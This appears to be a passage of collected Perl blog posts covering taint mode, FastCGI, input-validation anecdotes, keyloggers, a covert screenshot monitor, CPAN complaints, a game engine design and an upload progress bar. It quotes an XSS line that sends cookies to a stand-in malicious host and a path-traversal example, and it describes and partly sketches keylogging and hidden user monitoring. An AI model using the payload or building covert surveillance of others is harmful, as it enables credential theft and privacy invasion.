Fortunately it wasn't too difficult to fix my code to work under taint mode. I had already centralized my various string filtering functions into a small handful, which just needed to untaint the strings before returning them. Then it was just a matter of making sure I ran these filters everywhere a user ID gets passed into a function (I was relying on the fact that my userExists() check would fail if you gave it a bad user ID number, but the variable was technically still tainted, so I had to fix that properly).
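Untainting in Perl works by capturing the part of the string you trust through a regular expression; the capture variable comes out untainted. A minimal sketch of what one of those centralized filters might look like (the function name is made up for illustration, not my actual code):

```perl
use strict;
use warnings;

# Hypothetical untainting filter for user ID numbers. Extracting a
# regexp capture is the only way to untaint a value under -T.
sub filterUserId {
    my $id = shift;
    if (defined $id && $id =~ /^(\d+)$/) {
        return $1;    # the capture is an untainted copy
    }
    return undef;     # reject anything that isn't a plain number
}
```

Anything that doesn't match the whitelist pattern is rejected outright, which is the safe default.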
I've thoroughly tested all areas of my sites to make sure nothing broke. Hopefully I didn't miss any. :)
With mod_perl, the Apache server runs its own built-in Perl interpreter which is re-used between requests, so the overhead of loading a fresh Perl interpreter for every request goes away.
I got it all set up on my dev server first, and then realized it doesn't work with mod_suexec. With mod_suexec, multiple users on the web server can each have their own websites, and their Perl/CGI scripts execute in the name of that user instead of as the global Apache user. This makes permission handling easier: the Perl script can read and write files owned by the same user who owns the entire website. But with mod_perl, the Apache user executes the Perl scripts, and this causes problems.
So I found an alternative: FastCGI. It's still black magic to me, but it works similarly to mod_perl (reusing the same Perl process for multiple requests) while also working with mod_suexec. So, I've gotten Kirsle.net and Siikir.com to both use FastCGI now, and, well, both sites run a lot faster. :)
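The shape of a FastCGI Perl script is a simple accept loop. A sketch of the idea using the CGI::Fast module (the setup and render functions here are hypothetical placeholders, not my actual CMS code):

```perl
#!/usr/bin/perl
use strict;
use warnings;
use CGI::Fast;

# Expensive setup (loading modules, config, etc.) happens once and
# is re-used for every request the process handles.
my $cms = initialize_cms();    # hypothetical one-time setup

# Each pass through this loop serves one HTTP request.
while (my $q = CGI::Fast->new) {
    print $q->header("text/html");
    print $cms->render_page($q->param("p"));    # hypothetical method
}

sub initialize_cms { ... }    # stub for illustration
```

When no FastCGI environment is present, CGI::Fast degrades to behaving like plain CGI, which makes testing from the command line easy.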
Every request still creates its own unique instance of the Siikir CMS object, but I did tweak my JsonDB plugin a bit for performance too: while every request has its own CMS object, the JsonDB plugin is always a singleton object--it is only initialized once, and then it is shared between every request. Also, it caches the DB documents when it reads them and keeps the cache in memory until the document changes on disk. So this helps tremendously with the file I/O problem on my server. Running the search page on Siikir.com gives results in less than 3 seconds, whereas before it would easily take 10 to 15 seconds.
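The caching idea is simple enough to sketch: keep parsed documents in memory and only hit the disk when a file's modification time changes. This is a rough illustration of the concept, not my actual JsonDB code:

```perl
use strict;
use warnings;

my %cache;    # file name => { mtime => ..., data => ... }

# Return a parsed document, re-reading from disk only when the
# file's mtime says it changed since we last parsed it.
sub get_document {
    my ($file, $parser) = @_;
    my $mtime = (stat $file)[9];
    if (exists $cache{$file} && $cache{$file}{mtime} == $mtime) {
        return $cache{$file}{data};    # cache hit: no file I/O
    }
    my $data = $parser->($file);       # cache miss: read and parse
    $cache{$file} = { mtime => $mtime, data => $data };
    return $data;
}
```

The stat call is cheap compared to reading and parsing a JSON document, which is where the search page's speedup comes from.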
I'm still keeping a lookout for new bugs that may emerge, though. I have to test and make sure the JSON document caching is working properly, for example. But for now everything seems to be working out pretty well. :)
Here are some of my anecdotes from the times when I've personally been bit by this, so that hopefully you won't repeat my mistakes and will be more aware of just how many ways users can try to get past your site's defenses.
My anecdote: I once wrote a super simple guestbook in Perl. It had three form fields: a name and an e-mail which were both single-line text boxes, and a textarea which took multiple lines of text. Guestbook entries were stored in a flat text file, with one line per entry, so it looked like this:
Dave|dave@example.com|Hey, nice site!
Mike|mike@example.net|Hey, just leaving a guestbook entry!

Obviously, I stripped all HTML code out of all the form fields, in order to protect myself against an XSS attack. But, I figured, the "name" and "email" are text boxes that can't have multiple lines, and so I only filtered multiple lines from the "message" (I substituted them with a "<br>" instead, after removing other HTML, so they would display with multiple lines on the "view guestbook" page).
How I got bit: One of those Dumb Submitter Bots found my guestbook and spammed every field on the page with their multiple-line junk mail including hundreds of links to sites that are sure to infect you with a virus.
So, my guestbook.txt started to look like this:
Dave|dave@example.com|Hey, nice site!
Mike|mike@example.net|Hey, just leaving a guestbook entry!
Rolex watches 80% off!
[url=spam site 1]click here![/url]
[url=spam site 2]click here![/url]|spammer@spammy.ru|Rolex watches 80% off!<br><br>[url=spam site 1]click here![/url]...

The result wasn't too bad, though: just a few garbled guestbook entries displayed on the page that shouldn't have been there, making the page look broken.
Lessons learned: Never, NEVER trust your form inputs. Literally ANY type of data can be sent in ANY of your fields. To be clear, even your <select> boxes aren't safe. You may think you've limited the user to sending only one of a few options when they submit the form, but they can still easily submit anything else in that field.
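The fix for my guestbook is to enforce "single-line" server-side, no matter what the browser claims about the field. A sketch of the kind of filter I mean (the function name is just for illustration):

```perl
use strict;
use warnings;

# Force a "single-line" form field to actually be a single line,
# regardless of what the client sent.
sub single_line {
    my $text = shift // "";
    $text =~ s/[\x0D\x0A]+/ /g;    # collapse CR/LF runs into a space
    return $text;
}
```

Run every supposedly single-line field (name, e-mail) through something like this before writing it to the flat file, and a Dumb Submitter Bot can no longer break your one-line-per-entry format.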
/index.cgi?p=about

My site was coded to take this parameter and open a text file named "about.txt" to get the content of the page the user wanted, something along the lines of:
my $page = "./private/pages/" . $q->param("p") . ".txt";

One of my friends kindly broke this for me and told me what he did: he linked to a page with a URI that looked more along the lines of this:
/index.cgi?p=../users/admin

And so the file my site was opening was "./private/pages/../users/admin.txt", or, more canonically, "./private/users/admin.txt"; and so he was able to download the private user information for my admin user, including the password (I don't think I even hashed my passwords back then, either). Bad!
Any user-supplied data that is going to be used to access the server filesystem should be thoroughly filtered. Nowadays I would use a regular expression like this:
$p =~ s/[^A-Za-z0-9\.\-]//g;

This strips out everything that isn't a number, letter, period or dash.
This is an unexpected vector of attack. User-Agents and Referers are just as easy for a malicious user to edit to anything they want as a form field is. So, once I was viewing my User-Agent page and I got a JavaScript error in my browser. Investigating, I found a bit of broken JavaScript code on my page, inside my list of User-Agents!
It was along the lines of this:
<script>window.location = "http://something-malicious.ru/cookie.php?cookie= + document.cookie;</script>

The intent was clearly to redirect anyone viewing the page to the attacker's site, sending their cookies along; luckily for me, the attacker's own code was broken and only threw a JavaScript error.
A great many web applications rely on the environment variable REMOTE_ADDR, which contains the remote user's IP address. Web apps log your IP along with the things you post on the site, so that if they need to ban you for spamming, they're able to ban you by your IP address.
But this breaks when you get proxy servers involved, because a proxy server makes requests to your web app on behalf of numerous users on the other side, and if you ban the proxy server's IP address, you ban a lot of innocent users. So, a lot of proxy servers will send an "X-Forwarded-For" header to your server which contains the IP address of the user behind the proxy.
So, a lot of poorly coded web apps will prefer X-Forwarded-For instead of the REMOTE_ADDR, for example by using code like this:
my $ip = $ENV{HTTP_X_FORWARDED_FOR} || $ENV{REMOTE_ADDR};

But X-Forwarded-For should be considered user-supplied information. A malicious user can set this header to anything they want, which means they can try embedding HTML code in it (so when your web forum shows the IP address to your admins, the HTML code executes instead), or they may merely fake their IP address with it (like setting it to the localhost address, 127.0.0.1).
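A safer approach is to treat the header as untrusted input: only accept it when it at least looks like an IP address, and fall back to the TCP-level REMOTE_ADDR otherwise. A sketch of the idea (a simple IPv4-shaped check for illustration; real code would validate octet ranges and handle IPv6 too):

```perl
use strict;
use warnings;

# Pick a client IP, treating X-Forwarded-For as untrusted input.
sub client_ip {
    my %env = @_;
    my $fwd = $env{HTTP_X_FORWARDED_FOR} // "";
    if ($fwd =~ /^(\d{1,3}(?:\.\d{1,3}){3})$/) {
        return $1;    # plausible IP; still only safe for display/logging
    }
    return $env{REMOTE_ADDR};    # what the TCP connection actually says
}
```

Even a well-formed X-Forwarded-For can be a lie, so never use it for anything security-critical like bans; at best it's a logging hint.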
Anyway, I hope after reading this you'll keep in mind that the phrase "never trust your user" extends even to some pretty unusual places.
Well, that keylogger had its problems, though it had a couple of pros compared to my new keylogger too. The problem was that it required root privileges on the Linux system you ran it on, because it needed to read directly from the /dev/input/* devices, which only the root user has permission to do. It also needed you to figure out ahead of time which device node to read from. And finally, it didn't work on some types of keyboards (I only tested it with a USB keyboard, but I've heard reports from others that it just doesn't work for them).
The only pro it had was that it would log keys at the hardware level, including on text mode terminals.
And so, the new keylogger does not require root privileges! The new keylogger does rely on the X Window System, but that's the de facto windowing system on just about every Linux/Unix system out there today. This also means it will only log keys entered into graphical applications (though for desktop *nix users, that covers just about everybody), so users on a text-mode terminal won't be logged.
One issue I ran into, though, is that the xinput test command seems to expect you to have a terminal (or TTY), i.e. that you run the command from a graphical terminal. Trying to read the output of this command in Perl caused a weird buffering issue, where the command wouldn't give any output until about 100 characters were typed. So, the script requires the IO::Pty::Easy module, which creates a virtual TTY so that xinput believes you're running it from a real shell.
The new keylogger's source code can be found here. Have fun! :)
When run from a graphical terminal, the $DISPLAY environment variable is already set to your current X display, e.g. ":0.0". But when launched from a non-graphical environment, the script needs to set the value of $DISPLAY itself in order for xinput to know which X server to connect to.
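Putting the two pieces together, the reading side of the script looks roughly like this (the device ID "8" and the display string are example assumptions; the real script discovers the keyboard's device ID itself):

```perl
#!/usr/bin/perl
# Sketch: give xinput a pseudo-terminal via IO::Pty::Easy so its
# output isn't block-buffered, and make sure $DISPLAY is set.
use strict;
use warnings;
use IO::Pty::Easy;

$ENV{DISPLAY} ||= ":0.0";         # needed when not launched from X

my $pty = IO::Pty::Easy->new;
$pty->spawn("xinput test 8");     # "8" = example keyboard device ID

while ($pty->is_active) {
    my $out = $pty->read(1);      # read with a 1-second timeout
    print $out if defined $out;   # raw key press/release events
}
```

Because xinput sees a TTY on the other end, it flushes each event line as it happens instead of waiting for a full buffer.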
Well, maybe if the keylogger changed the value of $DISPLAY to log from different X servers, it might be able to cross the partitions set up by Qubes. I'll have to investigate this further.
Today I learned the hard way that file handle names in Perl can conflict with package names of Perl modules.
I was adding emoticon support to my Siikir CMS ( :-) ), and so I had downloaded this open source Tango emoticon set that came with an emoticons.txt file that described what trigger texts correspond to each PNG image. So, I wanted to write a quick Perl script that would use the JSON module and convert this plain text emoticon list into a JSON file that the Siikir CMS could use.
For some slight backstory, Siikir uses JSON all over the place. The entire database system is using JSON, and so Siikir has a "JsonDB" plugin that manages all database access. It looks like this:
my $db = $self->Master->JsonDB->getDocument("users/by-name/kirsle");
Anyway, the JsonDB plugin creates a JSON object as follows:
$self->{json} = JSON->new->utf8->pretty();
This has always worked fine. But for some odd reason, my little Perl script that converted my emoticons to JSON for me was throwing this bizarre error message from the same constructor:
Can't locate object method "new" via package "IO::File" at mkjson.pl line 4.
This made no sense to me. What, was IO::File failing to load? So I add an explicit "use IO::File;" in my code (ordinarily, if JSON requires this module, it should've auto-loaded when I did "use JSON;", but something was wrong here). This turns the error message into this:
Can't locate object method "utf8" via package "GLOB" at mkjson.pl line 4.
WTF. I try to debug this weird error message in all the usual ways (like using Data::Dumper to dump the contents of %INC, and verifying that the JSON.pm being loaded is the same one the Siikir CMS uses; it was). After running out of ideas, I scrapped using JSON.pm in this script and just hard-coded it to write JSON code to the output file directly.
Then it was time to create the Emoticons plugin for Siikir, which would be a centralized piece of code to render emoticons for every page that wants them. I couldn't use the JsonDB to manage the emoticons now, because each emoticon "theme" is supposed to keep its own "emoticons.json" file within itself, instead of putting them in my global database directory. So, Emoticons.pm needed to use its own JSON object.
I was bizarrely running into the same dumb error messages in my Emoticons plugin too. I thought for a minute that maybe the environment of my bash terminal running my small script was different than the Apache server's environment, because my JsonDB plugin never threw these sorts of errors. But now my Emoticons plugin was throwing errors just like my small script was!
Well, here is the full source of my small script (I added in the exit 1 right after the JSON constructor line just to test the JSON line without the chance of running the entire script again, should the error miraculously disappear):
#!/usr/bin/perl -w
use strict;
use warnings;
use JSON;
use Data::Dumper;
#die Dumper(\%INC);
my $json = JSON->new->utf8->pretty();
exit 1;
open (EMO, "emoticons.txt");
open (JSON, ">emoticons.json");
print JSON "{\n"
    . "\tname: 'Tango',\n"
    . "\tsource: 'http://digsbies.org/site/content/project/tango-emoticons-big-pack',\n"
    . "\tmap: {\n";
while (my $line = <EMO>) {
    chomp $line;
    $line =~ s/[\x0D\x0A]+//g;
    next unless length $line;
    my ($img,@codes) = split(/\s+/, $line);
    my @escaped;
    foreach my $c (@codes) {
        $c =~ s/\'/\\'/g;
        push (@escaped, $c);
    }
    my $escaped = join(", ", map { qq{'$_'} } @escaped);
    print JSON "\t\t\"$img\": [ $escaped ],\n";
}
print JSON "\t}\n}";
close (JSON);
close (EMO);
See the problem? Apparently, because I had named my output filehandle "JSON", this was conflicting with the package named JSON. If I cut out all of the code after the "exit 1", the error went away and the code would compile and run just fine. The same problem occurred in my Emoticons plugin because I was using "JSON" as the filehandle name when reading the JSON text from disk. Changing the name for the filehandle fixed my problem.
My JsonDB module used the names READ and WRITE for its filehandles, which is why this problem didn't occur there.
So, apparently, filehandles share the same namespace as packages. The annoying thing is that the errors you get are completely misleading. :(
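The modern way to dodge this class of bug entirely is lexical filehandles with the three-argument open: the handle lives in a "my" variable, not in the package symbol table where it can collide with a module name. A sketch of the fix (using JSON::PP here, the pure-Perl JSON encoder that ships with modern Perls and has the same constructor API as JSON.pm):

```perl
use strict;
use warnings;
use JSON::PP;

# The constructor works fine: no filehandle can shadow the package.
my $json = JSON::PP->new->utf8->pretty;

# The handle is a plain scalar, so it can't collide with a package
# name the way "open (JSON, ...)" did.
open my $out, '>', 'emoticons.json' or die "Can't write: $!";
print $out $json->encode({ name => 'Tango' });
close $out;
```

Lexical filehandles also close themselves when the variable goes out of scope, which is a nice bonus.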
Sometimes, Perl code I work with exhibits signs of "quantum" behavior. By this I mean, in quantum physics, an electron behaves as both a wave and a particle, unless you actually look closely at it to see which one it chooses to behave as. In which case it behaves as a particle, which makes sense to everybody because an electron is a particle. See "Double Slit Experiment" for more on that.
At various different times in my software development career, a bug would pop up in the Perl code. Something is broken, the program gives wrong results or it crashes due to an error. Let's say the error is something that looks like,
Can't coerce array into hash at script.pl line 1337.
The obvious culprit here is that at line 1337, the variable it's trying to treat as an associative array (a hash) is instead a regular array. So first thing I would do here is find this line, and then add some "print" lines of code to see what type of data is in that variable. Aha, it's an array, now I have to trace it back in the code to find out at what point this data became an array.
Usually a problem like this occurs due to an oversight by one of the other developers. A developer trying to fix one bug might have assigned an array to this variable because it was convenient for solving their problem, not knowing at the time that the change broke this code I'm working with now. So I go on debugging, adding print statements here and there to check what's inside every variable.
Once the problem is thoroughly diagnosed and I can see what's in every variable along the way, the bug just mysteriously vanishes. Every variable contains the data I would expect them to, the bug stops happening, and the only thing I changed in the code was just the simple adding of debug code. My code didn't modify the program in any tangible way, and yet the bug is gone.
So I have a WTF reaction, and remove all my debugging code. The bug is still "fixed." I check the svn diff to see the differences between my copy of the code and the last copy I checked out from Subversion. Nothing that would make a difference. I svn revert, turning my copy back to the original one, before I touched it at all. The bug is still gone!
So I blame the quantum perl fairy and call the bug resolved and it doesn't come back up again. Weird.
TL;DR - the QA people see a bug on their computers, file a bug report, the developer (me) sees the report, tests the bug to make sure it's there, begins debugging it only enough to diagnose the problem well enough that the next step would be to fix it, and the bug just fixes itself. The process of looking at the bug made the bug fix itself like some sort of black magic.
I love Perl as a programming language. It's easy, fast enough for almost any application, and is often called the "swiss army chainsaw" of programming languages because it makes easy tasks easy and hard tasks possible. But it doesn't excel in a couple of areas, which I'll outline below, due to the state of neglect of some of its modules and ports.
use Tk;

This module is probably one of the most neglected modules on CPAN. It was a direct port of the Tcl/Tk that was current at the time Perl/Tk was written. The result is that when you run a Perl/Tk program on any platform other than Windows, it resembles an excruciatingly ugly Motif-style application (see my screenshots of my Perl CyanChat Client for examples). Under Windows, though, a Perl/Tk app more or less fits in.
Because Perl/Tk was a direct port of a very old version of Tk, updating it to keep it modern has been a difficult task and so naturally nobody has done it. The only love Perl/Tk gets these days is maintenance work just to be sure it can still be compiled for modern versions of Perl.
So what can we do about this?
There are a couple other Tk implementations for Perl: Tkx by ActiveState and Tcl::Tk. These two modules are modern Tk implementations for Perl, and so they look very nice on every platform. But how usable are they?
Tkx is ActiveState's creation, and I've only been able to get it to work when using ActivePerl. This is fine for Windows, where ActivePerl is arguably the most popular Perl interpreter for Windows. But when I tried compiling Tkx for a stock Perl that ships with Fedora Linux, it gives segmentation faults and crashes. It's not usable under Linux with a stock version of Perl.
There's an ActivePerl for Linux, though, but the problem is that this Perl installation would be independent of the stock Perl that comes with your operating system. So if I needed to install another third party module to use with an ActivePerl/Tkx application, I wouldn't be able to run a simple "yum install perl-{module}" command to get it. I'd have to use ActivePerl's ppm tool, if it even had the module I wanted; otherwise I'd need to compile the module myself for ActivePerl. Yuck. This isn't "the Linux way" of doing things. The package manager should be aware of everything that you install on your system.
ActivePerl/Tkx is out of the question for Linux then. What about Tcl::Tk? I've attempted to compile and use Tcl::Tk on a few different versions of Fedora Linux and every time they give me segmentation faults just like Tkx did. No good.
So Tk is one thing that Perl can't do very well due to lots of neglect. In contrast, the Tk ports for Python, Ruby and Tcl (of course) are much better maintained.
I know there are ports to GTK+, Wx and Qt for Perl as well, if you want to create a GUI. In my experience: Wx has a completely broken HTML widget in Perl and parts of the demo crash, GTK+ is neglected too, and I never got Qt to compile.
The Perl SDL module is very "feature incomplete." The only notable thing anybody has made with Perl SDL was Frozen Bubble, and the developers of that had to hack up their code a lot to get around the limitations of the SDL module.
Perl for games? Sure, if you want to blow the dust off the SDL module and are ready to do a ton more hacking than you wanted to just to get it to work.
Most other languages have modern SDL ports. Pygame comes to mind as I mentioned before, which has a fairly active community of users actually creating games in Python.
Perl's GD module, though, is in a pretty bad state of neglect. All it's good for in Perl is scaling images down, and even then it doesn't do very well: look at my photo album on kirsle.net. It can't seem to save a JPEG image with any decent amount of quality; every image it saves comes out extremely grainy, and it completely ignores any settings to make it not do this.
Generating an image from scratch? Maybe you can get it to work with enough effort, but good luck getting text to show up in any color besides black. Using a "template image" to generate a dynamic image off of? Good luck coming up with new colors to use that aren't in the template image. It's just a giant mess.
Image::Magick or Imager are better alternatives, at least. I started using Image::Magick on all my new web development projects, and the next iteration of kirsle.net's code will be using that to handle images instead of GD.
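For comparison, this is the kind of Image::Magick (PerlMagick) call sequence I mean; the file names and quality value are just examples:

```perl
use strict;
use warnings;
use Image::Magick;

my $img = Image::Magick->new;
my $err = $img->Read("photo.jpg");    # returns an error string on failure
die $err if $err;

$img->Resize(geometry => "800x600");  # scale to fit within 800x600
$img->Set(quality => 90);             # GD ignored this; Magick honors it
$err = $img->Write("thumb.jpg");
die $err if $err;
```

Unlike GD, the quality setting actually takes effect, and generating images from scratch (text, colors, composites) is well supported.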
It's also good, of course, for regular expressions and number crunching, which is what it was targeted towards in the first place.
It's not particularly strong at anything else though. Creating a graphical application? Good luck. Creating a game? Don't think about it. Use Python instead.
There are a ton of other modules on CPAN collecting dust that don't work anymore, or don't work particularly well. Net::YMSG for interacting with Yahoo Messenger? Completely broken. Net::AIM for AOL Instant Messenger? Not working (but Net::OSCAR still works as far as I last checked). Audio::Audiere? I don't know anybody who's managed to compile it.
Part of me hopes Perl 6 will be usable soon and I can start learning that (contrary to popular belief, Perl 6 is not the successor to Perl 5 but is a completely separate language), and that any new modules for Perl 6 will be modern (using modern Tk and SDL for example) and will be maintained well in the future, as the ports for Python and other languages are. But part of me just thinks I should put a lot more effort into making Python my new favorite language and using Perl only for the few tasks that Perl does well (like for shell scripting).
Why? To see if anybody else uses my computer when I'm not there, and to see what they were doing with it.
Basically, you run this script as root, and it monitors your major hardware input devices for any activity. By default it watches /dev/console (which, on Fedora systems, seems to output data whenever there's keyboard activity), and /dev/input/mice (which is a common node for the collective input of any and all mice attached to a computer).
When it sees any activity at all on either of these devices (it doesn't care what the devices are doing, it just cares that they're active), it begins taking screenshots. If you use the keyboard or mouse for a little bit, and then stop for 2 seconds, it takes a screenshot. If you use the keyboard or mouse constantly and don't stop, it will take a screenshot every 5 seconds.
So it essentially creates a visual log of everything you were doing on the computer; every time you type, stop typing, type like crazy, move the mouse, stop moving the mouse... anything that happens, a screenshot is taken.
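A condensed sketch of that watch-and-shoot loop (paths and timings mirror the description above; the real script is more elaborate):

```perl
#!/usr/bin/perl
# Sketch: watch an input device for activity and take screenshots
# with scrot. Run as root; /root/shots is an example output path.
use strict;
use warnings;
use IO::Select;

open my $mice, '<', '/dev/input/mice' or die "open: $!";
my $sel = IO::Select->new($mice);

my $active = 0;    # time of last screenshot during activity
while (1) {
    if ($sel->can_read(2)) {              # activity within 2 seconds?
        sysread $mice, my $junk, 256;     # discard; we only care *that* it moved
        if (time - $active >= 5) {        # at most one shot per 5 seconds
            system("scrot", "/root/shots/" . time . ".png");
            $active = time;
        }
    } elsif ($active) {
        # 2 seconds of silence after activity: take one final shot.
        system("scrot", "/root/shots/" . time . ".png");
        $active = 0;
    }
}
```

The select() timeout does double duty: it rate-limits the loop and detects the 2-second pause that triggers the "user stopped" screenshot.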
It uses scrot to take the screenshot, since this is the lightest-weight screen capturing program I could find. Using ImageMagick's import command is slow and makes the computer beep, and GNOME's screenshot application can't run without showing a GUI window.
You can check it out here. You'll be required to edit the script in the "configuration" section though, at least to change the directory where it saves the screenshots to.
Since the script runs as root, the images it creates are naturally owned by root as well, and can't be deleted by the nonprivileged user, even if the user does manage to find the screenshots. Better yet, you can have the screenshots saved under root's home directory, keeping them completely out-of-sight for the user. And, to kill the script, you have to be root since it will be a root-owned process. +1 if your unauthorized users don't know your root password!
/dev/input/event0. You run it as root again, and it saves keystrokes to a file under /tmp. Actually, it doesn't store all keystrokes; instead, it stores what the user "intended" to type. That is, if a user begins typing a sentence, makes a typo, hits backspace a few times and then continues typing, what gets logged is what they actually ended up typing. You don't see their typo; when they hit backspace, the log buffer also deletes the last character it logged before saving it to disk.
It separates what they type based on certain "divider characters," which includes Tab, Return and Enter. So as they fill out a web form, the script would log one line of text for each field they filled out as they tab through the form. Also, if they delay their typing for a few seconds it will dump the current buffer to the log file as well, so if they're a particularly slow typer, one "sentence" may span multiple lines in the log file.
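The "intended text" buffer boils down to a few lines of logic; here's a sketch (the key names are placeholders for however the event source labels them):

```perl
use strict;
use warnings;

my $buffer = "";    # what the user has typed so far
my @log;            # flushed lines of "intended" text

# Feed one decoded key at a time into the buffer.
sub handle_key {
    my $key = shift;
    if ($key eq "BACKSPACE") {
        chop $buffer;                      # forget the typo too
    } elsif ($key =~ /^(TAB|RETURN|ENTER)$/) {
        push @log, $buffer if length $buffer;
        $buffer = "";                      # divider key: flush one line
    } else {
        $buffer .= $key;                   # ordinary character
    }
}
```

A timer that flushes $buffer after a few seconds of silence handles the slow-typist case described above.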
I can't recommend using this keylogger for malicious purposes; it's being uploaded for educational purposes only, and should only be used as a personal desktop monitoring solution, if it should be used at all.
Source code: keylog.
The type of game I'll be making with it will be a 2D RPG type game, with a top-down perspective (think: Zelda, SNES-era Star Ocean, etc.). I feel that this type of game offers the most flexibility, having a wide-open game world where you can move your character in two dimensions.
I'm programming it in Perl, because I know Perl better than any other language (with Java coming in second place, but I'll avoid getting Java involved if I can help it). ;) However, it's highly possible that I'll need to switch languages down the line, so I'm future-proofing what code I am writing just in case any major changes need to happen.
For example, I like the model employed by Sierra and LucasArts when they made their games based on AGI (Adventure Game Interpreter) and SCUMM (Script Creation Utility for Maniac Mansion), respectively. Their game engines were programmed in who-knows-what language (likely C), but the games themselves--the scripts for dialog and interactions within the game--used a new, home-made programming language. This way, the game engine can be reprogrammed in a different language, and the existing games can "just run" on the new engine without any modification.
This is how ScummVM is able to run old SCUMM games; they've just re-implemented the SCUMM engine, and the existing games can "just run" on ScummVM without requiring them to be modified at all.
So, my game engine will be similar, using a new scripting language, so that if I have to scrap Perl in the future and go to Java, all I need to do is re-implement the engine in Java, and what game code I have written will "just work" on the new engine.
Now, as for the Perl stuff... I'm future-proofing my code against other Perl modules, too.
The engine runs out of a core Perl module, and it uses multiple "front-end plug-ins" to actually interact with the user. They're divided into three categories: Graphics Front-end, Sound Front-end, and Filesystem Front-end.
Perl/Tk may be dated, and look ugly as hell on Unix, but if the Tk window only consists of a Canvas widget (which is what I'm planning for), you won't be able to tell. Compose a nice picture in a Canvas and it looks the same on all platforms.
Tk Canvas treats everything you draw in them as "objects", or sprites as far as my game will be concerned. It means that once you put an image in the canvas, you can move that image around later by its ID. SDL, on the other hand, is not sprite-based, but pixel-based, so to move a sprite you've already placed, you have to erase it and redraw it. Plus one for Tk.
Tk Canvas doesn't support layers, but it does support "implied layering"... that is, each object you place on the canvas gets an implicit Z-index that's one higher than the object you placed before it. This is the same as the default behavior in HTML. When you move sprites around after placing them, they'll either stay above or below other sprites, depending on the order the sprites were drawn. Therefore, by drawing sprites in the right order, layers can be simulated. SDL doesn't support layers either, so +1 for Tk here again.
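The sprite handling I'm describing looks like this in Perl/Tk (the widget calls are real Tk API; the image file name is an example):

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Tk;

my $mw     = MainWindow->new;
my $canvas = $mw->Canvas(-width => 320, -height => 240)->pack;

# Each drawn item gets an ID; later you move it by that handle
# instead of erasing and redrawing pixels like SDL requires.
my $img    = $mw->Photo(-file => "player.png");
my $sprite = $canvas->createImage(32, 32, -image => $img);

$canvas->move($sprite, 8, 0);    # slide the sprite 8px to the right

MainLoop;
```

Items drawn later sit above items drawn earlier, which is exactly the "implied layering" described above.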
At any rate, the graphics front-end won't be too integrated with the core game engine. Instead, it will register callbacks to the engine, so Tk will say "when you want me to draw a sprite, call this function of mine and I'll take care of it."
This way, the core engine just tells the graphics front-end what to do: what sprites to draw, where to move them to, etc. and the front-end just does as it's told. This way, the internals of Perl/Tk don't get caught up in the core engine; if I need to ditch Tk and use SDL instead, I just need to make SDL respond to the same commands from the core as Tk does and all is well.
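The registration mechanism itself is just a dispatch table of code refs. A sketch of the idea (event and function names here are illustrative, not the engine's real API):

```perl
use strict;
use warnings;

my %frontend;    # event name => code ref supplied by the front-end

# The front-end calls this to plug itself into the core engine.
sub register {
    my ($event, $code) = @_;
    $frontend{$event} = $code;
}

# The core engine calls this; it neither knows nor cares whether
# Tk, SDL, or anything else is on the other end.
sub emit {
    my ($event, @args) = @_;
    $frontend{$event}->(@args) if $frontend{$event};
}

# Example: a front-end registering its sprite-drawing handler.
register(draw_sprite => sub {
    my ($id, $x, $y) = @_;
    return "drew $id at $x,$y";    # a real front-end would draw here
});
```

Swapping Tk for SDL then means writing a new set of handlers and registering them; the core engine never changes.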
Tk doesn't have any audio support of any kind. But fortunately, there are other Perl modules that can handle audio. For Windows computers, there is Win32::MediaPlayer, and for Linux there is GStreamer.
Win32::MediaPlayer and GStreamer both can play whatever codecs the user has installed. On Windows this means it can play mp3, wav, even midi music out-of-box. On Linux it means it can play wav, ogg, and other formats that aren't patented. If the Linux user installs MP3 support, though, GStreamer can play mp3 files too!
Similar to the graphics front-end, the sound front-end registers callbacks. When the core wants to play a sound effect, it calls a method in the sound front-end to do so, and the sound front-end does it.
If I stick with open audio formats, I can have an SDL audio front-end to get sound for Mac OS X too, since there isn't yet a Perl module to play sound natively on OS X.
With such an archiving algorithm, the game could store all its data files (images and scripts) into a read-only archive, which only the game knows the password to. This stops the players from getting in there and seeing sprites for characters in the game they haven't seen yet themselves, and especially to prevent them from modifying the game's script if they do manage to get into the archive.
(By the way, my game engine will probably be released as open source software, so you'll be able to make your own games with it; just stay out of my games' files!)
Until Archive::Tyd is completed though, the game will just read files off the filesystem directly. But the filesystem front-end is there so that in the future, I can replace it with one that reads files out of Tyd archives instead.
Anyway, I've already gotten a few hundred lines of code written, and the general framework for the engine is already working (abstracting away the graphics front-end from the core, for example). I've recently completed a tileset handling Perl module which I intend to use for it.
When I get more work done, and especially when there's a playable demo of the game engine, I'll probably make a small website for it as a subdomain of kirsle.net.
This is a re-do of my previous blog post about Perl upload progress bars - my previous approach was completely wrong. By the time $q->upload(); is used, the file has already been received and stored in a temporary location, and so the "progress bar" in this case is really just gauging how fast the server can copy the file from one place to another on its hard drive.
So this post is how to do a real, working file upload progress bar in Perl.
The basic steps required to do this include:

1. Generate a unique session ID for the upload form.
2. In the upload CGI, register a read hook with CGI.pm so that, as the file streams in, the script can record how many bytes have been received so far, keyed by that session ID.
3. Have JavaScript on the upload page poll the server for that session's progress and update the bar.
4. When the upload completes, read the file with $q->upload(); and everything like before.

The source code needed for this is still amazingly short and concise, compared to the code you'll get when you download solutions from elsewhere.
Implementing this doesn't require any special Apache handlers or mod_perl or anything fancy like that.
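The server side hinges on CGI.pm's upload hook: pass a code ref to CGI->new and it gets called repeatedly while the POST body streams in. A sketch of the receiving script (the progress-file path and session handling are assumptions for illustration):

```perl
#!/usr/bin/perl
use strict;
use warnings;
use CGI;

my $sessid = "example";    # in practice, taken from the query string

# CGI.pm calls this hook as each chunk of the upload arrives, so we
# can write the running byte count somewhere the poller can read it.
sub hook {
    my ($filename, $buffer, $bytes_read, $data) = @_;
    open my $fh, '>', "/tmp/progress-$sessid" or return;
    print $fh $bytes_read;    # total bytes received so far
    close $fh;
}

my $q = CGI->new(\&hook);             # hook runs during the POST
my $upload = $q->upload("incoming");  # by now the file is complete
```

A second, tiny CGI script just reads /tmp/progress-$sessid and returns the number for the JavaScript poller to display.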
Sources:
upload.html
<!DOCTYPE html>
<html>
<head>
<title>Upload Test</title>
<style type="text/css">
body {
background-color: #FFFFFF;
font-family: Verdana,Arial,sans-serif;
font-size: small;
color: #000000
}
#trough {
border: 1px solid #000000;
height: 16px;
display: block;
background-color: #DDDDDD
}
#bar {
background-color: #0000FF;
background-image: url("blue-clearlooks.png");
border-right: 1px solid #000000;
height: 16px
}
</style>
</head>
<body>
<h1>File Upload Test</h1>
<div id="progress-div" style="display: none; width: 400px; margin: auto">
<fieldset>
